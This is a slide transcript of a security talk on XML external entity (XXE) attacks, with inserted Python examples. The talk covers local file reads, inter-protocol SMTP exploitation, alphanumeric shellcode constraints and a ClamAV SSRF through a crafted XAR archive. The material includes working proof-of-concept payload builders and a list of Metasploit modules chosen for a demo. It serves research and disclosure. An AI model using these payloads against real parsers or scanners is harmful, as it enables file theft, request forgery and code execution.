exploitable markup language
TRANSCRIPT
<?xml version="1.0"?>
<!DOCTYPE presentation [ <!ENTITY HacktivityLogo SYSTEM "http://hacktivity.com/logo.png"> ]>
<presentation>
<logos>&HacktivityLogo;</logos>
<title>eXploitable Markup Language</title>
<speakers>
<speaker Name="Rajtmár Ákos">
<email>[email protected]</email>
</speaker>
<speaker Name="Szakály Tamás">
<email>[email protected]</email>
<twitter>@sghctoma</twitter>
</speaker>
</speakers>
</presentation>
Possible Hacktivity topics
How secure are today’s games?
Possible vulns in the EventLog subsystem of recent Windows systems.
The security of smart houses.
Well known XML attacks
XSLT-related
XInclude attacks
Entity-based attacks
• Billion laughs
• XXE
Everybody should read “XML Schema, DTD, and Entity Attacks” by VSR
DON'Ts
Yet more XML-related web application attacks: there are lots of those already.
But the web is not the whole world. (not yet, anyway :) )
Won't show any new XML vulnerabilities.
DOs
Show exciting ways to exploit
Deal with the client side
Deal with XML-derivatives, and files with embedded XML parts
There are tons of these.
Often people don’t even realize they are dealing with XML
Some examples: X3D, CML, BeerXML, GPX, OpenDocument, EPUB, you name it.
XML entities
What are "entities" in XML-world? Named pieces of replacement text, declared in the DTD (<!ENTITY name "text">) and referenced in the document as &name;.
OK, what are "external entities"? Entities whose replacement text lives outside the document: <!ENTITY name SYSTEM "uri"> makes the parser fetch that URI when &name; is referenced.
http://www.w3.org/TR/2006/REC-xml11-20060816/#sec-entity-decl
XXE Intro
Most basic XXE: include resources
App has to display something from the XML (the expanded entity has to reach the output, otherwise the resource is fetched but you never see it)
Interesting protocol handlers
• jar: (Java) fetches a .jar and extracts a file from it
• file:// pointing at a directory returns a directory listing in some parsers (e.g. Java's)
• php:// with filters, e.g. php://filter/convert.base64-encode/resource=/etc/passwd, returns the file base64-encoded so it survives as entity content
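An added example (my own code, not from the talk) of the basic XXE above, using Python's stdlib xml.sax: the same document is parsed once with external general entities enabled (the vulnerable setting) and once with the default, hardened setting. The secret file, its path and the recipe-style element names are constructed for the demo; the file:// URL assumes a POSIX filesystem.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collects character data, i.e. what an application would 'display'."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, data):
        self.parts.append(data)


def parse_text(xml_bytes, resolve_external_entities):
    """Parse a document and return its text content.

    feature_external_ges controls resolution of external general entities;
    it is off by default (since Python 3.7.1), and turning it on is the bug.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def xxe_document(target_url):
    """Constructed document: an external entity pointing at target_url,
    referenced from an element the application displays."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE recipe [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        "<recipe><name>&xxe;</name></recipe>\n" % target_url
    ).encode("utf-8")


def demo():
    """Write a throwaway secret file, then read it back through the parser
    in both configurations. Returns the text each configuration produced."""
    with tempfile.TemporaryDirectory() as workdir:
        secret = os.path.join(workdir, "secret.txt")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("s3cr3t")  # constructed secret, no trailing newline
        doc = xxe_document("file://" + secret)  # POSIX path assumed
        return {
            "vulnerable": parse_text(doc, True),   # file contents leak
            "hardened": parse_text(doc, False),    # entity left unexpanded
        }


if __name__ == "__main__":
    print(demo())
```

The vulnerable parse returns the file's contents because the <name> text is what the application shows; the hardened one returns an empty string because the reference is simply not expanded. Most other parsers have an equivalent switch (libxml2's NOENT/DTDLOAD options, the external-general-entities SAX feature in Java); the fix is to leave it off and never turn it on for untrusted input.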
Parameter entities
Special type of entity: declared and referenced with % instead of &
More flexible, e.g. used to pull in an external DTD
Can not be used in the XML body, only inside the DTD
XML syntax is not a must for the included content: DTD conformity is all that is required
Non-XML-conform content (a config file, a private key) can still be included by wrapping it in <![CDATA[ ]]>: an external combine.dtd concatenates a "<![CDATA[" entity, the file entity and a "]]>" entity
Sending local file content: one external parameter entity reads the file, another builds the outgoing URL that carries it
Different protocol handlers: FTP, HTTP, FILE
Differences in implementation between parsers
Out-of-band (OOB)
XXE meets inter-protocol exploitation
Requirements: encapsulation (the target service has to accept the parser's request as one of its own messages) and error tolerance (it has to keep going after the garbage lines around the payload)
Main difficulty: limited character set
Let's check some XML parsers' badchars
Internet Explorer
• only ASCII
• URL-encodes some chars (e.g. space -> %20)
• cuts newlines
Visual Studio
• URL-encodes every non-alphanumeric char
Trigger BoF via XXE
http://exploit-db.com/exploits/31789
Alphanum shellcode
Restricted to alphanumeric characters
Has to be valid UTF-8 too!!
Metasploit Framework
Encoders: x86/alpha_mixed, x86/alpha_upper
Useful options: BufferRegister, AllowWin32SEH
The payload
qB8w
Need "jmp esp" with an ASCII-only address
0x77384271 stored little-endian (the way x86 keeps it in memory) is the bytes 71 42 38 77, i.e. "qB8w"
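An added example (my own code, not from the talk) that turns the badchar observations above into a check you can run a payload through before trying it. Each parser profile is a model of what the slides say that parser does to an entity URL (Internet Explorer: ASCII only, space becomes %20, newlines cut; Visual Studio: every non-alphanumeric byte URL-encoded; libxml2: a URI with a newline is rejected), not measured behaviour, so treat the profiles as assumptions. It also checks whether a return address survives as alphanumeric bytes when written little-endian, which is the "qB8w" trick. The SMTP command sequence is constructed.

```python
import string
import struct

ALNUM_BYTES = set((string.ascii_letters + string.digits).encode())


def seen_by_internet_explorer(payload: str) -> str:
    """Model of IE's entity fetch (assumption, from the slides):
    non-ASCII dropped, newlines cut, space URL-encoded as %20."""
    ascii_only = "".join(c for c in payload if ord(c) < 128)
    no_newlines = ascii_only.replace("\r", "").replace("\n", "")
    return no_newlines.replace(" ", "%20")


def seen_by_visual_studio(payload: str) -> str:
    """Model of Visual Studio (assumption, from the slides):
    every non-alphanumeric byte is percent-encoded."""
    return "".join(
        chr(b) if b in ALNUM_BYTES else "%%%02X" % b
        for b in payload.encode("utf-8")
    )


def seen_by_libxml2(payload: str):
    """Model of libxml2's strict URI check (assumption): a URI containing
    a newline or a non-ASCII byte is rejected, so the request never leaves.
    None means 'nothing is sent at all'."""
    if "\n" in payload or "\r" in payload or not payload.isascii():
        return None
    return payload


PARSERS = {
    "internet_explorer": seen_by_internet_explorer,
    "visual_studio": seen_by_visual_studio,
    "libxml2": seen_by_libxml2,
}


def survives(payload: str, parser: str) -> bool:
    """True if the target service would receive the payload byte-for-byte."""
    return PARSERS[parser](payload) == payload


def le_bytes(addr: int) -> bytes:
    """How a 32-bit address lands in memory on x86: little-endian."""
    return struct.pack("<I", addr)


def is_alphanumeric_address(addr: int) -> bool:
    """Can this return address be embedded in an alphanumeric-only payload?"""
    return all(b in ALNUM_BYTES for b in le_bytes(addr))


def alphanumeric_gadgets(candidates):
    """Filter a list of candidate 'jmp esp' addresses down to usable ones."""
    return [a for a in candidates if is_alphanumeric_address(a)]


# Constructed SMTP command sequence. Inter-protocol SMTP needs CRLF line
# ends, so a parser that cuts or encodes newlines cannot drive a mail server.
SMTP_PAYLOAD = "HELO x\r\nMAIL FROM:<a@b>\r\nRCPT TO:<c@d>\r\nDATA\r\n"

if __name__ == "__main__":
    for name, transform in PARSERS.items():
        print(name, survives(SMTP_PAYLOAD, name), transform(SMTP_PAYLOAD))
    print(le_bytes(0x77384271))  # b'qB8w'
```

Under these profiles no SMTP payload survives any of the three parsers, which is exactly why the talk needs an application that passes newlines through (the "\n application" discussed below) before the SMTPloitation demo works; the address check is what you would run over a list of candidate "jmp esp" locations to find one like 0x77384271.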
Installed Pidgin
Jabber configured
accounts.xml
Request external DTD
Generating mailer payload
Sending malicious content
Authenticated as user
Inter-protocol SMTPloitation
Garmin Training Center
+ Not bothering with \n (newlines get through untouched)
- Yet not able to evaluate &variables;
Possible implementation issue
Visual Studio 2012
+ Ability to evaluate &variables;
- A great fan of URL encoding
Permanent fail?
Slight possibility of using Garmin
I believe I saw it working
Finding another \n application
Visual Studio can be "controlled"
Sending multiple files
Delivering more attacks
Not at all
XXE the AV!
Original idea: .docx vs. virus scanners
Grepped ClamAV’s source for “xml”
It uses libxml2 to open XAR archives
basically an archive format with compressed XML metadata
What other AVs know this format?
EICAR string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
XARd it, and sent to VirusTotal
Besides ClamAV, these can deal with XAR:
AVG, Ad-Aware, Avast, Avira, BitDefender, DrWeb, ESET-NOD32, Emsisoft, F-Secure, Gdata, Kaspersky, NANO-Antivirus, Qihoo-360, nProtect, MicroWorld-eScan
There Can Be Only One
AVs use XML parsers without knowledge of DTD
Except ClamAV
• Only recent versions >= 0.98.1
So let’s hack ClamAV!
XAR format
XAR hexdump
PoC
Python script to create XARs with custom XML
Simple XML with HTTP external entity:
Scanned it with clamscan...
... and it worked!
&Some haxx0r stuff;
libxml2 limitation: very strict URI checking, for example no newlines allowed
OOB attacks are very, very limited: only files without newlines can be stolen
SSRF is our Super Mushroom
• only GET requests
• only HTTP
• payload cannot contain non-ASCII chars
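An added example, my own code and not the speakers' script: it builds a XAR archive whose XML table of contents carries a DOCTYPE with an HTTP external entity, then reads the archive back. The header layout (28-byte big-endian header with the "xar!" magic, header size, version, compressed and uncompressed TOC length and checksum algorithm; a zlib-compressed TOC; a heap that starts with the SHA-1 of the compressed TOC) follows the XAR format. The TOC contents, entity name, probe URL and the EICAR payload are constructed, and the URL check is an approximation of libxml2's strict URI rules and of the GET-only, HTTP-only, ASCII-only constraints above.

```python
import hashlib
import struct
import zlib

XAR_MAGIC = b"xar!"
# struct xar_header: magic, header size, version, TOC length (compressed),
# TOC length (uncompressed), checksum algorithm. Big-endian, 28 bytes.
XAR_HEADER = struct.Struct(">4sHHQQI")
XAR_VERSION = 1
CKSUM_SHA1 = 1
SHA1_LEN = 20

# Constructed file payload: the EICAR test string from the slide.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def check_entity_url(url: str) -> str:
    """Approximation of what survives libxml2's URI check and ClamAV's
    environment: ASCII, no whitespace or newlines, plain http:// (GET).
    Rejecting early beats producing an archive whose entity is never fetched."""
    if not url.isascii() or any(c in url for c in " \t\r\n"):
        raise ValueError("URI would fail libxml2's strict URI check: %r" % url)
    if not url.startswith("http://"):
        raise ValueError("only plain HTTP GET is usable from the scanner: %r" % url)
    return url


def build_toc(entity_url: str, payload_len: int) -> bytes:
    """TOC XML whose DOCTYPE declares an external general entity, referenced
    from <name>; a DTD-aware parser (libxml2 in ClamAV) expands it."""
    check_entity_url(entity_url)
    toc = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE xar [ <!ENTITY ssrf SYSTEM "%s"> ]>\n'
        "<xar><toc>\n"
        '  <checksum style="sha1"><offset>0</offset><size>%d</size></checksum>\n'
        '  <file id="1"><name>&ssrf;</name><type>file</type>\n'
        "    <data><offset>%d</offset><size>%d</size><length>%d</length>\n"
        '      <encoding style="application/octet-stream"/></data>\n'
        "  </file>\n"
        "</toc></xar>\n"
    ) % (entity_url, SHA1_LEN, SHA1_LEN, payload_len, payload_len)
    return toc.encode("utf-8")


def build_xar(toc_xml: bytes, payload: bytes) -> bytes:
    """Header + zlib-compressed TOC + heap (TOC checksum, then file data)."""
    compressed = zlib.compress(toc_xml)
    header = XAR_HEADER.pack(XAR_MAGIC, XAR_HEADER.size, XAR_VERSION,
                             len(compressed), len(toc_xml), CKSUM_SHA1)
    heap = hashlib.sha1(compressed).digest() + payload
    return header + compressed + heap


def parse_xar(blob: bytes) -> dict:
    """Minimal reader: validates magic, inflates the TOC, checks its SHA-1."""
    magic, hsize, version, clen, ulen, alg = XAR_HEADER.unpack_from(blob, 0)
    if magic != XAR_MAGIC:
        raise ValueError("not a XAR archive")
    compressed = blob[hsize:hsize + clen]
    toc = zlib.decompress(compressed)
    if len(toc) != ulen:
        raise ValueError("TOC length mismatch")
    heap = blob[hsize + clen:]
    checksum_ok = (alg != CKSUM_SHA1
                   or heap[:SHA1_LEN] == hashlib.sha1(compressed).digest())
    return {"version": version, "toc": toc, "heap": heap,
            "checksum_ok": checksum_ok, "has_doctype": b"<!DOCTYPE" in toc}


if __name__ == "__main__":
    toc = build_toc("http://127.0.0.1:8080/?probe", len(EICAR))  # constructed probe URL
    with open("poc.xar", "wb") as fh:
        fh.write(build_xar(toc, EICAR))
    print(parse_xar(build_xar(toc, EICAR))["toc"].decode())
```

Point the probe URL at a listener you control and scan the file with a DTD-aware scanner to see the request arrive; a scanner that parses the TOC without DTD support stops at the undefined &ssrf; reference and never fetches anything, which is the "There Can Be Only One" observation above in practice.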
Finding suitable exploits
while read -r module; do
  # keep only modules whose source mentions none of 443, POST or SSL
  grep -q -E -i "443|post|ssl" "$module" || echo "$module"
done < ~/msf_http.txt > ~/msf_http_nossl_nopost.txt
linux/http/esva_exec
linux/http/dreambox_openpli_shell
linux/http/fritzbox_echo_exec
linux/http/symantec_web_gateway_lfi
linux/http/symantec_web_gateway_pbcontrol
linux/http/ddwrt_cgibin_exec
multi/http/struts_code_exec
multi/http/vtiger_install_rce
multi/http/v0pcr3w_exec
multi/http/snortreport_exec
multi/http/spree_search_exec
multi/http/phptax_exec
multi/http/gitorious_graph
multi/http/familycms_less_exec
multi/http/gestioip_exec
multi/http/freenas_exec_raw
multi/http/ajaxplorer_checkinstall_exec
multi/http/spree_searchlogic_exec
multi/http/oracle_reports_rce
multi/http/mobilecartly_upload_exec
unix/http/freepbx_callmenum
unix/webapp/cacti_graphimage_exec
unix/webapp/awstats_configdir_exec
unix/webapp/barracuda_img_exec
unix/webapp/invision_pboard_unserialize_exec
unix/webapp/basilic_diff_exec
unix/webapp/awstats_migrate_exec
unix/webapp/google_proxystylesheet_exec
unix/webapp/base_qry_common
unix/webapp/tikiwiki_graph_formula_exec
unix/webapp/mambo_cache_lite
unix/webapp/awstatstotals_multisort
unix/webapp/openview_connectednodes_exec
unix/webapp/php_charts_exec
unix/webapp/php_vbulletin_template
unix/webapp/freepbx_config_exec
unix/webapp/twiki_search
unix/webapp/twiki_history
unix/webapp/mitel_awc_exec
unix/webapp/instantcms_exec
unix/webapp/redmine_scm_exec
windows/http/sap_configservlet_exec_noauth
Our choice for the demo
unix/webapp/freepbx_config_exec
Further research
Games that use XML for game saves, network communication
• Skyrim
• Flight Gear
XML metadata
• RDF
Binary XML parsers
• Cwxml
• OpenEXI
• EXIficient
• AgileDelta
• Windows EventLog format (since Vista)
Network Configuration Protocol (NETCONF)
XML databases
• IBM DB2
• Oracle
• MSSQL
THX